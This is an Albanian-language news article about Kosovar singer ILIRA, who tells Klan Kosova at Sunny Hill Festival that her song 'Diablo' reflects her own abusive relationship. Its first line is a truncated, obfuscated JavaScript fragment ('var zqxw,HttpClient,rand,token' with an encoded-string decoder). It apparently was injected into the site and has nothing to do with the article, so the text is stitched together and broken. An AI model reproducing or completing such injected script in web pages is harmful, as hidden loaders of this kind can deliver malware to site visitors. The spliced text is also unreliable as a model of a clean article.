;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

“Kisha lidhje abuzive, prandaj shkrova këtë këngë” – rrëfehet këngëtarja shqiptare

By

Ajo është një emër i ri i skenës muzikore botërore që sapo ka nisur të dalë në sipërfaqe.

Dhe PO, është shqiptare nga Kosova.

Listës së bujshme të emrave të vajzave shqiptare që po bëjnë namin me muzikën e tyre do u bashkëngjitet edhe një emër i ri.

ILIRA, është vajza për të cilën e kemi fjalën, e që është krahasuar me talentin e muzikën e Rihannas e shqiptares Dua Lipa.

Madje kompania amerikane e videoklipeve, VEVO ka publikuar një këngë të sajën, duke thënë: “Nëse ju pëlqen Rihanna dhe Dua Lipa, ILIRA, s’duhet t’iu ikë nga radarët”.

Së fundmi ajo ka dhënë një intervistë për Klan Kosovën nga Sunny Hill Festival menjëherë pas performancës së saj energjike.

Meqë ajo është deklaruar se i shkruan vet këngët e saj, Ilira u pyet nëse kënga Diablo që flet për një romancë toksike ku gruaja është viktima e një burri, ka diçka personale.

“Kam kaluar edhe vet në një lidhje abuzive dhe dua t’iu tregoj të gjithëve se ajo gjë nuk është në rregull”, ka thënë Ilira, e cila e ka shkruar vet edhe këngën “Diablo” të cilën mund ta dëgjoni më poshtë:

Ketu e gjeni deklaraten e Ilires: 

Artikuj të ngjashëm